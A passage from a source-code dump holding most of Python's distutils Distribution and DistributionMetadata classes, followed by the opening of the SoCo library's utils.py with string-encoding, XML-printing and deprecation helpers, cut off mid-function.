specialized purpose, and then pass the subclass to 'setup()' as the 'distclass' keyword argument. If so, it is necessary to respect the expectations that 'setup' has of Distribution. See the code for 'setup()', in core.py, for details. """ # 'global_options' describes the command-line options that may be # supplied to the setup script prior to any actual commands. # Eg. "./setup.py -n" or "./setup.py --quiet" both take advantage of # these global options. This list should be kept to a bare minimum, # since every global option is also valid as a command option -- and we # don't want to pollute the commands with too many options that they # have minimal control over. # The fourth entry for verbose means that it can be repeated. 
global_options = [('verbose', 'v', "run verbosely (default)", 1), ('quiet', 'q', "run quietly (turns verbosity off)"), ('dry-run', 'n', "don't actually do anything"), ('help', 'h', "show detailed help message"), ('no-user-cfg', None, 'ignore pydistutils.cfg in your home directory'), ] # 'common_usage' is a short (2-3 line) string describing the common # usage of the setup script. common_usage = """\ Common commands: (see '--help-commands' for more) setup.py build will build the package underneath 'build/' setup.py install will install the package """ # options that are not propagated to the commands display_options = [ ('help-commands', None, "list all available commands"), ('name', None, "print package name"), ('version', 'V', "print package version"), ('fullname', None, "print <package name>-<version>"), ('author', None, "print the author's name"), ('author-email', None, "print the author's email address"), ('maintainer', None, "print the maintainer's name"), ('maintainer-email', None, "print the maintainer's email address"), ('contact', None, "print the maintainer's name if known, else the author's"), ('contact-email', None, "print the maintainer's email address if known, else the author's"), ('url', None, "print the URL for this package"), ('license', None, "print the license of the package"), ('licence', None, "alias for --license"), ('description', None, "print the package description"), ('long-description', None, "print the long package description"), ('platforms', None, "print the list of platforms"), ('classifiers', None, "print the list of classifiers"), ('keywords', None, "print the list of keywords"), ('provides', None, "print the list of packages/modules provided"), ('requires', None, "print the list of packages/modules required"), ('obsoletes', None, "print the list of packages/modules made obsolete") ] display_option_names = [translate_longopt(x[0]) for x in display_options] # negative options are options that exclude other options negative_opt = 
{'quiet': 'verbose'} # -- Creation/initialization methods ------------------------------- def __init__ (self, attrs=None): """Construct a new Distribution instance: initialize all the attributes of a Distribution, and then use 'attrs' (a dictionary mapping attribute names to values) to assign some of those attributes their "real" values. (Any attributes not mentioned in 'attrs' will be assigned to some null value: 0, None, an empty list or dictionary, etc.) Most importantly, initialize the 'command_obj' attribute to the empty dictionary; this will be filled in with real command objects by 'parse_command_line()'. """ # Default values for our command-line options self.verbose = 1 self.dry_run = 0 self.help = 0 for attr in self.display_option_names: setattr(self, attr, 0) # Store the distribution meta-data (name, version, author, and so # forth) in a separate object -- we're getting to have enough # information here (and enough command-line options) that it's # worth it. Also delegate 'get_XXX()' methods to the 'metadata' # object in a sneaky and underhanded (but efficient!) way. self.metadata = DistributionMetadata() for basename in self.metadata._METHOD_BASENAMES: method_name = "get_" + basename setattr(self, method_name, getattr(self.metadata, method_name)) # 'cmdclass' maps command names to class objects, so we # can 1) quickly figure out which class to instantiate when # we need to create a new command object, and 2) have a way # for the setup script to override command classes self.cmdclass = {} # 'command_packages' is a list of packages in which commands # are searched for. The factory for command 'foo' is expected # to be named 'foo' in the module 'foo' in one of the packages # named here. This list is searched from the left; an error # is raised if no named package provides the command being # searched for. (Always access using get_command_packages().) 
self.command_packages = None # 'script_name' and 'script_args' are usually set to sys.argv[0] # and sys.argv[1:], but they can be overridden when the caller is # not necessarily a setup script run from the command-line. self.script_name = None self.script_args = None # 'command_options' is where we store command options between # parsing them (from config files, the command-line, etc.) and when # they are actually needed -- ie. when the command in question is # instantiated. It is a dictionary of dictionaries of 2-tuples: # command_options = { command_name : { option : (source, value) } } self.command_options = {} # 'dist_files' is the list of (command, pyversion, file) that # have been created by any dist commands run so far. This is # filled regardless of whether the run is dry or not. pyversion # gives sysconfig.get_python_version() if the dist file is # specific to a Python version, 'any' if it is good for all # Python versions on the target platform, and '' for a source # file. pyversion should not be used to specify minimum or # maximum required Python versions; use the metainfo for that # instead. self.dist_files = [] # These options are really the business of various commands, rather # than of the Distribution itself. We provide aliases for them in # Distribution as a convenience to the developer. self.packages = None self.package_data = {} self.package_dir = None self.py_modules = None self.libraries = None self.headers = None self.ext_modules = None self.ext_package = None self.include_dirs = None self.extra_path = None self.scripts = None self.data_files = None self.password = '' # And now initialize bookkeeping stuff that can't be supplied by # the caller at all. 'command_obj' maps command names to # Command instances -- that's how we enforce that every command # class is a singleton. 
self.command_obj = {} # 'have_run' maps command names to boolean values; it keeps track # of whether we have actually run a particular command, to make it # cheap to "run" a command whenever we think we might need to -- if # it's already been done, no need for expensive filesystem # operations, we just check the 'have_run' dictionary and carry on. # It's only safe to query 'have_run' for a command class that has # been instantiated -- a false value will be inserted when the # command object is created, and replaced with a true value when # the command is successfully run. Thus it's probably best to use # '.get()' rather than a straight lookup. self.have_run = {} # Now we'll use the attrs dictionary (ultimately, keyword args from # the setup script) to possibly override any or all of these # distribution options. if attrs: # Pull out the set of command options and work on them # specifically. Note that this order guarantees that aliased # command options will override any supplied redundantly # through the general options dictionary. options = attrs.get('options') if options is not None: del attrs['options'] for (command, cmd_options) in options.items(): opt_dict = self.get_option_dict(command) for (opt, val) in cmd_options.items(): opt_dict[opt] = ("setup script", val) if 'licence' in attrs: attrs['license'] = attrs['licence'] del attrs['licence'] msg = "'licence' distribution option is deprecated; use 'license'" if warnings is not None: warnings.warn(msg) else: sys.stderr.write(msg + "\n") # Now work on the rest of the attributes. Any attribute that's # not already defined is invalid! 
for (key, val) in attrs.items(): if hasattr(self.metadata, "set_" + key): getattr(self.metadata, "set_" + key)(val) elif hasattr(self.metadata, key): setattr(self.metadata, key, val) elif hasattr(self, key): setattr(self, key, val) else: msg = "Unknown distribution option: %s" % repr(key) if warnings is not None: warnings.warn(msg) else: sys.stderr.write(msg + "\n") # no-user-cfg is handled before other command line args # because other args override the config files, and this # one is needed before we can load the config files. # If attrs['script_args'] wasn't passed, assume false. # # This also make sure we just look at the global options self.want_user_cfg = True if self.script_args is not None: for arg in self.script_args: if not arg.startswith('-'): break if arg == '--no-user-cfg': self.want_user_cfg = False break self.finalize_options() def get_option_dict(self, command): """Get the option dictionary for a given command. If that command's option dictionary hasn't been created yet, then create it and return the new dictionary; otherwise, return the existing option dictionary. 
""" dict = self.command_options.get(command) if dict is None: dict = self.command_options[command] = {} return dict def dump_option_dicts(self, header=None, commands=None, indent=""): from pprint import pformat if commands is None: # dump all command option dicts commands = sorted(self.command_options.keys()) if header is not None: self.announce(indent + header) indent = indent + " " if not commands: self.announce(indent + "no commands known yet") return for cmd_name in commands: opt_dict = self.command_options.get(cmd_name) if opt_dict is None: self.announce(indent + "no option dict for '%s' command" % cmd_name) else: self.announce(indent + "option dict for '%s' command:" % cmd_name) out = pformat(opt_dict) for line in out.split('\n'): self.announce(indent + " " + line) # -- Config file finding/parsing methods --------------------------- def find_config_files(self): """Find as many configuration files as should be processed for this platform, and return a list of filenames in the order in which they should be parsed. The filenames returned are guaranteed to exist (modulo nasty race conditions). There are three possible config files: distutils.cfg in the Distutils installation directory (ie. where the top-level Distutils __inst__.py file lives), a file in the user's home directory named .pydistutils.cfg on Unix and pydistutils.cfg on Windows/Mac; and setup.cfg in the current directory. The file in the user's home directory can be disabled with the --no-user-cfg option. 
""" files = [] check_environ() # Where to look for the system-wide Distutils config file sys_dir = os.path.dirname(sys.modules['distutils'].__file__) # Look for the system config file sys_file = os.path.join(sys_dir, "distutils.cfg") if os.path.isfile(sys_file): files.append(sys_file) # What to call the per-user config file if os.name == 'posix': user_filename = ".pydistutils.cfg" else: user_filename = "pydistutils.cfg" # And look for the user config file if self.want_user_cfg: user_file = os.path.join(os.path.expanduser('~'), user_filename) if os.path.isfile(user_file): files.append(user_file) # All platforms support local setup.cfg local_file = "setup.cfg" if os.path.isfile(local_file): files.append(local_file) if DEBUG: self.announce("using config files: %s" % ', '.join(files)) return files def parse_config_files(self, filenames=None): from configparser import ConfigParser # Ignore install directory options if we have a venv if sys.prefix != sys.base_prefix: ignore_options = [ 'install-base', 'install-platbase', 'install-lib', 'install-platlib', 'install-purelib', 'install-headers', 'install-scripts', 'install-data', 'prefix', 'exec-prefix', 'home', 'user', 'root'] else: ignore_options = [] ignore_options = frozenset(ignore_options) if filenames is None: filenames = self.find_config_files() if DEBUG: self.announce("Distribution.parse_config_files():") parser = ConfigParser() for filename in filenames: if DEBUG: self.announce(" reading %s" % filename) parser.read(filename) for section in parser.sections(): options = parser.options(section) opt_dict = self.get_option_dict(section) for opt in options: if opt != '__name__' and opt not in ignore_options: val = parser.get(section,opt) opt = opt.replace('-', '_') opt_dict[opt] = (filename, val) # Make the ConfigParser forget everything (so we retain # the original filenames that options come from) parser.__init__() # If there was a "global" section in the config file, use it # to set Distribution options. 
if 'global' in self.command_options: for (opt, (src, val)) in self.command_options['global'].items(): alias = self.negative_opt.get(opt) try: if alias: setattr(self, alias, not strtobool(val)) elif opt in ('verbose', 'dry_run'): # ugh! setattr(self, opt, strtobool(val)) else: setattr(self, opt, val) except ValueError as msg: raise DistutilsOptionError(msg) # -- Command-line parsing methods ---------------------------------- def parse_command_line(self): """Parse the setup script's command line, taken from the 'script_args' instance attribute (which defaults to 'sys.argv[1:]' -- see 'setup()' in core.py). This list is first processed for "global options" -- options that set attributes of the Distribution instance. Then, it is alternately scanned for Distutils commands and options for that command. Each new command terminates the options for the previous command. The allowed options for a command are determined by the 'user_options' attribute of the command class -- thus, we have to be able to load command classes in order to parse the command line. Any error in that 'options' attribute raises DistutilsGetoptError; any error on the command-line raises DistutilsArgError. If no Distutils commands were found on the command line, raises DistutilsArgError. Return true if command-line was successfully parsed and we should carry on with executing commands; false if no errors but we shouldn't execute commands (currently, this only happens if user asks for help). """ # # We now have enough information to show the Macintosh dialog # that allows the user to interactively specify the "command line". 
# toplevel_options = self._get_toplevel_options() # We have to parse the command line a bit at a time -- global # options, then the first command, then its options, and so on -- # because each command will be handled by a different class, and # the options that are valid for a particular class aren't known # until we have loaded the command class, which doesn't happen # until we know what the command is. self.commands = [] parser = FancyGetopt(toplevel_options + self.display_options) parser.set_negative_aliases(self.negative_opt) parser.set_aliases({'licence': 'license'}) args = parser.getopt(args=self.script_args, object=self) option_order = parser.get_option_order() log.set_verbosity(self.verbose) # for display options we return immediately if self.handle_display_options(option_order): return while args: args = self._parse_command_opts(parser, args) if args is None: # user asked for help (and got it) return # Handle the cases of --help as a "global" option, ie. # "setup.py --help" and "setup.py --help command ...". For the # former, we show global options (--verbose, --dry-run, etc.) # and display-only options (--name, --version, etc.); for the # latter, we omit the display-only options and show help for # each command listed on the command line. if self.help: self._show_help(parser, display_options=len(self.commands) == 0, commands=self.commands) return # Oops, no commands found -- an end-user error if not self.commands: raise DistutilsArgError("no commands supplied") # All is well: return true return True def _get_toplevel_options(self): """Return the non-display options recognized at the top level. This includes options that are recognized *only* at the top level as well as options recognized for commands. """ return self.global_options + [ ("command-packages=", None, "list of packages that provide distutils commands"), ] def _parse_command_opts(self, parser, args): """Parse the command-line options for a single command. 
'parser' must be a FancyGetopt instance; 'args' must be the list of arguments, starting with the current command (whose options we are about to parse). Returns a new version of 'args' with the next command at the front of the list; will be the empty list if there are no more commands on the command line. Returns None if the user asked for help on this command. """ # late import because of mutual dependence between these modules from distutils.cmd import Command # Pull the current command from the head of the command line command = args[0] if not command_re.match(command): raise SystemExit("invalid command name '%s'" % command) self.commands.append(command) # Dig up the command class that implements this command, so we # 1) know that it's a valid command, and 2) know which options # it takes. try: cmd_class = self.get_command_class(command) except DistutilsModuleError as msg: raise DistutilsArgError(msg) # Require that the command class be derived from Command -- want # to be sure that the basic "command" interface is implemented. if not issubclass(cmd_class, Command): raise DistutilsClassError( "command class %s must subclass Command" % cmd_class) # Also make sure that the command object provides a list of its # known options. if not (hasattr(cmd_class, 'user_options') and isinstance(cmd_class.user_options, list)): raise DistutilsClassError(("command class %s must provide " + "'user_options' attribute (a list of tuples)") % \ cmd_class) # If the command class has a list of negative alias options, # merge it in with the global negative aliases. negative_opt = self.negative_opt if hasattr(cmd_class, 'negative_opt'): negative_opt = negative_opt.copy() negative_opt.update(cmd_class.negative_opt) # Check for help_options in command class. They have a different # format (tuple of four) so we need to preprocess them here. 
if (hasattr(cmd_class, 'help_options') and isinstance(cmd_class.help_options, list)): help_options = fix_help_options(cmd_class.help_options) else: help_options = [] # All commands support the global options too, just by adding # in 'global_options'. parser.set_option_table(self.global_options + cmd_class.user_options + help_options) parser.set_negative_aliases(negative_opt) (args, opts) = parser.getopt(args[1:]) if hasattr(opts, 'help') and opts.help: self._show_help(parser, display_options=0, commands=[cmd_class]) return if (hasattr(cmd_class, 'help_options') and isinstance(cmd_class.help_options, list)): help_option_found=0 for (help_option, short, desc, func) in cmd_class.help_options: if hasattr(opts, parser.get_attr_name(help_option)): help_option_found=1 if callable(func): func() else: raise DistutilsClassError( "invalid help function %r for help option '%s': " "must be a callable object (function, etc.)" % (func, help_option)) if help_option_found: return # Put the options from the command-line into their official # holding pen, the 'command_options' dictionary. opt_dict = self.get_option_dict(command) for (name, value) in vars(opts).items(): opt_dict[name] = ("command line", value) return args def finalize_options(self): """Set final values for all the options on the Distribution instance, analogous to the .finalize_options() method of Command objects. """ for attr in ('keywords', 'platforms'): value = getattr(self.metadata, attr) if value is None: continue if isinstance(value, str): value = [elm.strip() for elm in value.split(',')] setattr(self.metadata, attr, value) def _show_help(self, parser, global_options=1, display_options=1, commands=[]): """Show help for the setup script command-line in the form of several lists of command-line options. 'parser' should be a FancyGetopt instance; do not expect it to be returned in the same state, as its option table will be reset to make it generate the correct help text. 
If 'global_options' is true, lists the global options: --verbose, --dry-run, etc. If 'display_options' is true, lists the "display-only" options: --name, --version, etc. Finally, lists per-command help for every command name or command class in 'commands'. """ # late import because of mutual dependence between these modules from distutils.core import gen_usage from distutils.cmd import Command if global_options: if display_options: options = self._get_toplevel_options() else: options = self.global_options parser.set_option_table(options) parser.print_help(self.common_usage + "\nGlobal options:") print('') if display_options: parser.set_option_table(self.display_options) parser.print_help( "Information display options (just display " + "information, ignore any commands)") print('') for command in self.commands: if isinstance(command, type) and issubclass(command, Command): klass = command else: klass = self.get_command_class(command) if (hasattr(klass, 'help_options') and isinstance(klass.help_options, list)): parser.set_option_table(klass.user_options + fix_help_options(klass.help_options)) else: parser.set_option_table(klass.user_options) parser.print_help("Options for '%s' command:" % klass.__name__) print('') print(gen_usage(self.script_name)) def handle_display_options(self, option_order): """If there were any non-global "display-only" options (--help-commands or the metadata display options) on the command line, display the requested info and return true; else return false. """ from distutils.core import gen_usage # User just wants a list of commands -- we'll print it out and stop # processing now (ie. if they ran "setup --help-commands foo bar", # we ignore "foo bar"). if self.help_commands: self.print_commands() print('') print(gen_usage(self.script_name)) return 1 # If user supplied any of the "display metadata" options, then # display that metadata in the order in which the user supplied the # metadata options. 
any_display_options = 0 is_display_option = {} for option in self.display_options: is_display_option[option[0]] = 1 for (opt, val) in option_order: if val and is_display_option.get(opt): opt = translate_longopt(opt) value = getattr(self.metadata, "get_"+opt)() if opt in ['keywords', 'platforms']: print(','.join(value)) elif opt in ('classifiers', 'provides', 'requires', 'obsoletes'): print('\n'.join(value)) else: print(value) any_display_options = 1 return any_display_options def print_command_list(self, commands, header, max_length): """Print a subset of the list of all commands -- used by 'print_commands()'. """ print(header + ":") for cmd in commands: klass = self.cmdclass.get(cmd) if not klass: klass = self.get_command_class(cmd) try: description = klass.description except AttributeError: description = "(no description available)" print(" %-*s %s" % (max_length, cmd, description)) def print_commands(self): """Print out a help message listing all available commands with a description of each. The list is divided into "standard commands" (listed in distutils.command.__all__) and "extra commands" (mentioned in self.cmdclass, but not a standard command). The descriptions come from the command class attribute 'description'. """ import distutils.command std_commands = distutils.command.__all__ is_std = {} for cmd in std_commands: is_std[cmd] = 1 extra_commands = [] for cmd in self.cmdclass.keys(): if not is_std.get(cmd): extra_commands.append(cmd) max_length = 0 for cmd in (std_commands + extra_commands): if len(cmd) > max_length: max_length = len(cmd) self.print_command_list(std_commands, "Standard commands", max_length) if extra_commands: print() self.print_command_list(extra_commands, "Extra commands", max_length) def get_command_list(self): """Get a list of (command, description) tuples. The list is divided into "standard commands" (listed in distutils.command.__all__) and "extra commands" (mentioned in self.cmdclass, but not a standard command). 
The descriptions come from the command class attribute 'description'. """ # Currently this is only used on Mac OS, for the Mac-only GUI # Distutils interface (by Jack Jansen) import distutils.command std_commands = distutils.command.__all__ is_std = {} for cmd in std_commands: is_std[cmd] = 1 extra_commands = [] for cmd in self.cmdclass.keys(): if not is_std.get(cmd): extra_commands.append(cmd) rv = [] for cmd in (std_commands + extra_commands): klass = self.cmdclass.get(cmd) if not klass: klass = self.get_command_class(cmd) try: description = klass.description except AttributeError: description = "(no description available)" rv.append((cmd, description)) return rv # -- Command class/object methods ---------------------------------- def get_command_packages(self): """Return a list of packages from which commands are loaded.""" pkgs = self.command_packages if not isinstance(pkgs, list): if pkgs is None: pkgs = '' pkgs = [pkg.strip() for pkg in pkgs.split(',') if pkg != ''] if "distutils.command" not in pkgs: pkgs.insert(0, "distutils.command") self.command_packages = pkgs return pkgs def get_command_class(self, command): """Return the class that implements the Distutils command named by 'command'. First we check the 'cmdclass' dictionary; if the command is mentioned there, we fetch the class object from the dictionary and return it. Otherwise we load the command module ("distutils.command." + command) and fetch the command class from the module. The loaded class is also stored in 'cmdclass' to speed future calls to 'get_command_class()'. Raises DistutilsModuleError if the expected module could not be found, or if that module does not define the expected class. 
""" klass = self.cmdclass.get(command) if klass: return klass for pkgname in self.get_command_packages(): module_name = "%s.%s" % (pkgname, command) klass_name = command try: __import__ (module_name) module = sys.modules[module_name] except ImportError: continue try: klass = getattr(module, klass_name) except AttributeError: raise DistutilsModuleError( "invalid command '%s' (no class '%s' in module '%s')" % (command, klass_name, module_name)) self.cmdclass[command] = klass return klass raise DistutilsModuleError("invalid command '%s'" % command) def get_command_obj(self, command, create=1): """Return the command object for 'command'. Normally this object is cached on a previous call to 'get_command_obj()'; if no command object for 'command' is in the cache, then we either create and return it (if 'create' is true) or return None. """ cmd_obj = self.command_obj.get(command) if not cmd_obj and create: if DEBUG: self.announce("Distribution.get_command_obj(): " \ "creating '%s' command object" % command) klass = self.get_command_class(command) cmd_obj = self.command_obj[command] = klass(self) self.have_run[command] = 0 # Set any options that were supplied in config files # or on the command line. (NB. support for error # reporting is lame here: any errors aren't reported # until 'finalize_options()' is called, which means # we won't report the source of the error.) options = self.command_options.get(command) if options: self._set_command_options(cmd_obj, options) return cmd_obj def _set_command_options(self, command_obj, option_dict=None): """Set the options for 'command_obj' from 'option_dict'. Basically this means copying elements of a dictionary ('option_dict') to attributes of an instance ('command'). 'command_obj' must be a Command instance. If 'option_dict' is not supplied, uses the standard option dictionary for this command (from 'self.command_options'). 
""" command_name = command_obj.get_command_name() if option_dict is None: option_dict = self.get_option_dict(command_name) if DEBUG: self.announce(" setting options for '%s' command:" % command_name) for (option, (source, value)) in option_dict.items(): if DEBUG: self.announce(" %s = %s (from %s)" % (option, value, source)) try: bool_opts = [translate_longopt(o) for o in command_obj.boolean_options] except AttributeError: bool_opts = [] try: neg_opt = command_obj.negative_opt except AttributeError: neg_opt = {} try: is_string = isinstance(value, str) if option in neg_opt and is_string: setattr(command_obj, neg_opt[option], not strtobool(value)) elif option in bool_opts and is_string: setattr(command_obj, option, strtobool(value)) elif hasattr(command_obj, option): setattr(command_obj, option, value) else: raise DistutilsOptionError( "error in %s: command '%s' has no such option '%s'" % (source, command_name, option)) except ValueError as msg: raise DistutilsOptionError(msg) def reinitialize_command(self, command, reinit_subcommands=0): """Reinitializes a command to the state it was in when first returned by 'get_command_obj()': ie., initialized but not yet finalized. This provides the opportunity to sneak option values in programmatically, overriding or supplementing user-supplied values from the config files and command line. You'll have to re-finalize the command object (by calling 'finalize_options()' or 'ensure_finalized()') before using it for real. 'command' should be a command name (string) or command object. If 'reinit_subcommands' is true, also reinitializes the command's sub-commands, as declared by the 'sub_commands' class attribute (if it has one). See the "install" command for an example. Only reinitializes the sub-commands that actually matter, ie. those whose test predicates return true. Returns the reinitialized command object. 
""" from distutils.cmd import Command if not isinstance(command, Command): command_name = command command = self.get_command_obj(command_name) else: command_name = command.get_command_name() if not command.finalized: return command command.initialize_options() command.finalized = 0 self.have_run[command_name] = 0 self._set_command_options(command) if reinit_subcommands: for sub in command.get_sub_commands(): self.reinitialize_command(sub, reinit_subcommands) return command # -- Methods that operate on the Distribution ---------------------- def announce(self, msg, level=log.INFO): log.log(level, msg) def run_commands(self): """Run each command that was seen on the setup script command line. Uses the list of commands found and cache of command objects created by 'get_command_obj()'. """ for cmd in self.commands: self.run_command(cmd) # -- Methods that operate on its Commands -------------------------- def run_command(self, command): """Do whatever it takes to run a command (including nothing at all, if the command has already been run). Specifically: if we have already created and run the command named by 'command', return silently without doing anything. If the command named by 'command' doesn't even have a command object yet, create one. Then invoke 'run()' on that command object (or an existing one). """ # Already been here, done that? then return silently. 
if self.have_run.get(command): return log.info("running %s", command) cmd_obj = self.get_command_obj(command) cmd_obj.ensure_finalized() cmd_obj.run() self.have_run[command] = 1 # -- Distribution query methods ------------------------------------ def has_pure_modules(self): return len(self.packages or self.py_modules or []) > 0 def has_ext_modules(self): return self.ext_modules and len(self.ext_modules) > 0 def has_c_libraries(self): return self.libraries and len(self.libraries) > 0 def has_modules(self): return self.has_pure_modules() or self.has_ext_modules() def has_headers(self): return self.headers and len(self.headers) > 0 def has_scripts(self): return self.scripts and len(self.scripts) > 0 def has_data_files(self): return self.data_files and len(self.data_files) > 0 def is_pure(self): return (self.has_pure_modules() and not self.has_ext_modules() and not self.has_c_libraries()) # -- Metadata query methods ---------------------------------------- # If you're looking for 'get_name()', 'get_version()', and so forth, # they are defined in a sneaky way: the constructor binds self.get_XXX # to self.metadata.get_XXX. The actual code is in the # DistributionMetadata class, below. class DistributionMetadata: """Dummy class to hold the distribution meta-data: name, version, author, and so forth. 
""" _METHOD_BASENAMES = ("name", "version", "author", "author_email", "maintainer", "maintainer_email", "url", "license", "description", "long_description", "keywords", "platforms", "fullname", "contact", "contact_email", "license", "classifiers", "download_url", # PEP 314 "provides", "requires", "obsoletes", ) def __init__(self, path=None): if path is not None: self.read_pkg_file(open(path)) else: self.name = None self.version = None self.author = None self.author_email = None self.maintainer = None self.maintainer_email = None self.url = None self.license = None self.description = None self.long_description = None self.keywords = None self.platforms = None self.classifiers = None self.download_url = None # PEP 314 self.provides = None self.requires = None self.obsoletes = None def read_pkg_file(self, file): """Reads the metadata values from a file object.""" msg = message_from_file(file) def _read_field(name): value = msg[name] if value == 'UNKNOWN': return None return value def _read_list(name): values = msg.get_all(name, None) if values == []: return None return values metadata_version = msg['metadata-version'] self.name = _read_field('name') self.version = _read_field('version') self.description = _read_field('summary') # we are filling author only. 
self.author = _read_field('author') self.maintainer = None self.author_email = _read_field('author-email') self.maintainer_email = None self.url = _read_field('home-page') self.license = _read_field('license') if 'download-url' in msg: self.download_url = _read_field('download-url') else: self.download_url = None self.long_description = _read_field('description') self.description = _read_field('summary') if 'keywords' in msg: self.keywords = _read_field('keywords').split(',') self.platforms = _read_list('platform') self.classifiers = _read_list('classifier') # PEP 314 - these fields only exist in 1.1 if metadata_version == '1.1': self.requires = _read_list('requires') self.provides = _read_list('provides') self.obsoletes = _read_list('obsoletes') else: self.requires = None self.provides = None self.obsoletes = None def write_pkg_info(self, base_dir): """Write the PKG-INFO file into the release tree. """ with open(os.path.join(base_dir, 'PKG-INFO'), 'w', encoding='UTF-8') as pkg_info: self.write_pkg_file(pkg_info) def write_pkg_file(self, file): """Write the PKG-INFO format data to a file object. 
""" version = '1.0' if (self.provides or self.requires or self.obsoletes or self.classifiers or self.download_url): version = '1.1' file.write('Metadata-Version: %s\n' % version) file.write('Name: %s\n' % self.get_name() ) file.write('Version: %s\n' % self.get_version() ) file.write('Summary: %s\n' % self.get_description() ) file.write('Home-page: %s\n' % self.get_url() ) file.write('Author: %s\n' % self.get_contact() ) file.write('Author-email: %s\n' % self.get_contact_email() ) file.write('License: %s\n' % self.get_license() ) if self.download_url: file.write('Download-URL: %s\n' % self.download_url) long_desc = rfc822_escape(self.get_long_description()) file.write('Description: %s\n' % long_desc) keywords = ','.join(self.get_keywords()) if keywords: file.write('Keywords: %s\n' % keywords ) self._write_list(file, 'Platform', self.get_platforms()) self._write_list(file, 'Classifier', self.get_classifiers()) # PEP 314 self._write_list(file, 'Requires', self.get_requires()) self._write_list(file, 'Provides', self.get_provides()) self._write_list(file, 'Obsoletes', self.get_obsoletes()) def _write_list(self, file, name, values): for value in values: file.write('%s: %s\n' % (name, value)) # -- Metadata query methods ---------------------------------------- def get_name(self): return self.name or "UNKNOWN" def get_version(self): return self.version or "0.0.0" def get_fullname(self): return "%s-%s" % (self.get_name(), self.get_version()) def get_author(self): return self.author or "UNKNOWN" def get_author_email(self): return self.author_email or "UNKNOWN" def get_maintainer(self): return self.maintainer or "UNKNOWN" def get_maintainer_email(self): return self.maintainer_email or "UNKNOWN" def get_contact(self): return self.maintainer or self.author or "UNKNOWN" def get_contact_email(self): return self.maintainer_email or self.author_email or "UNKNOWN" def get_url(self): return self.url or "UNKNOWN" def get_license(self): return self.license or "UNKNOWN" get_licence = 
get_license def get_description(self): return self.description or "UNKNOWN" def get_long_description(self): return self.long_description or "UNKNOWN" def get_keywords(self): return self.keywords or [] def get_platforms(self): return self.platforms or ["UNKNOWN"] def get_classifiers(self): return self.classifiers or [] def get_download_url(self): return self.download_url or "UNKNOWN" # PEP 314 def get_requires(self): return self.requires or [] def set_requires(self, value): import distutils.versionpredicate for v in value: distutils.versionpredicate.VersionPredicate(v) self.requires = value def get_provides(self): return self.provides or [] def set_provides(self, value): value = [v.strip() for v in value] for v in value: import distutils.versionpredicate distutils.versionpredicate.split_provision(v) self.provides = value def get_obsoletes(self): return self.obsoletes or [] def set_obsoletes(self, value): import distutils.versionpredicate for v in value: distutils.versionpredicate.VersionPredicate(v) self.obsoletes = value def fix_help_options(options): """Convert a 4-tuple 'help_options' list as found in various command classes to the 3-tuple form required by FancyGetopt. """ new_options = [] for help_tuple in options: new_options.append(help_tuple[0:3]) return new_options
mit
simonalpha/SoCo
soco/utils.py
10
5604
# -*- coding: utf-8 -*-
"""This class contains utility functions used internally by SoCo."""

from __future__ import (
    absolute_import, print_function, unicode_literals
)

import functools
import re
import warnings

from .compat import (
    StringType, UnicodeType, quote_url
)
from .xml import XML


def really_unicode(in_string):
    """Make a string unicode. Really.

    Ensure ``in_string`` is returned as unicode through a series of
    progressively relaxed decodings.

    Args:
        in_string (str): The string to convert.

    Returns:
        str: Unicode.

    Raises:
        ValueError
    """
    if isinstance(in_string, StringType):
        # Decode byte input by trying progressively laxer codecs: strict
        # utf-8 first, then strict latin-1 (which accepts any byte value),
        # and finally ascii with unmappable bytes replaced, so a unicode
        # result is always produced.  Order matters: a valid utf-8 sequence
        # must win over a latin-1 reinterpretation of the same bytes.
        for args in (('utf-8',), ('latin-1',), ('ascii', 'replace')):
            try:
                # pylint: disable=star-args
                in_string = in_string.decode(*args)
                break
            except UnicodeDecodeError:
                continue
    # Anything that is not unicode by now was never a string of any kind.
    if not isinstance(in_string, UnicodeType):
        raise ValueError('%s is not a string at all.' % in_string)
    return in_string


def really_utf8(in_string):
    """Encode a string with utf-8. Really.

    First decode ``in_string`` via `really_unicode` to ensure it can
    successfully be encoded as utf-8. This is required since just calling
    encode on a string will often cause Python 2 to perform a coerced strict
    auto-decode as ascii first and will result in a `UnicodeDecodeError` being
    raised. After `really_unicode` returns a safe unicode string, encode as
    utf-8 and return the utf-8 encoded string.

    Args:
        in_string (str): The string to convert.

    Returns:
        str: utf-encoded data.
    """
    return really_unicode(in_string).encode('utf-8')


# Patterns for camel_to_underscore: FIRST_CAP_RE splits a capital that starts
# a new word ("CamelCase" -> "Camel_Case"); ALL_CAP_RE then handles the
# remaining lower/digit-to-upper transitions ("getHTTPPort" cases).
FIRST_CAP_RE = re.compile('(.)([A-Z][a-z]+)')
ALL_CAP_RE = re.compile('([a-z0-9])([A-Z])')


def camel_to_underscore(string):
    """Convert camelcase to lowercase and underscore.

    Recipe from http://stackoverflow.com/a/1176023

    Args:
        string (str): The string to convert.

    Returns:
        str: The converted string.
    """
    string = FIRST_CAP_RE.sub(r'\1_\2', string)
    return ALL_CAP_RE.sub(r'\1_\2', string).lower()


def prettify(unicode_text):
    """Return a pretty-printed version of a unicode XML string.

    Useful for debugging.

    Args:
        unicode_text (str): A text representation of XML (unicode,
            *not* utf-8).

    Returns:
        str: A pretty-printed version of the input.
    """
    # Imported locally: minidom is only needed for this debugging helper.
    import xml.dom.minidom
    reparsed = xml.dom.minidom.parseString(unicode_text.encode('utf-8'))
    return reparsed.toprettyxml(indent=" ", newl="\n")


def show_xml(xml):
    """Pretty print an :class:`~xml.etree.ElementTree.ElementTree` XML object.

    Args:
        xml (:class:`~xml.etree.ElementTree.ElementTree`): The
            :class:`~xml.etree.ElementTree.ElementTree` to pretty print

    Note:
        This is used a convenience function used during development. It
        is not used anywhere in the main code base.
    """
    string = XML.tostring(xml)
    print(prettify(string))


class deprecated(object):
    """A decorator for marking deprecated objects.

    Used internally by SoCo to cause a warning to be issued when the object
    is used, and marks the object as deprecated in the Sphinx documentation.

    Args:
        since (str): The version in which the object is deprecated.
        alternative (str, optional): The name of an alternative object to use
        will_be_removed_in (str, optional): The version in which the object is
            likely to be removed.

    Example:
        .. code-block:: python

            @deprecated(since="0.7", alternative="new_function")
            def old_function(args):
                pass
    """
    # pylint really doesn't like decorators!
    # pylint: disable=invalid-name, too-few-public-methods
    # pylint: disable=missing-docstring

    def __init__(self, since, alternative=None, will_be_removed_in=None):
        self.since_version = since
        self.alternative = alternative
        self.will_be_removed_in = will_be_removed_in

    def __call__(self, deprecated_fn):
        # functools.wraps keeps the wrapped function's name/docstring so the
        # appended ".. deprecated::" note below lands on the right object.
        @functools.wraps(deprecated_fn)
        def decorated(*args, **kwargs):
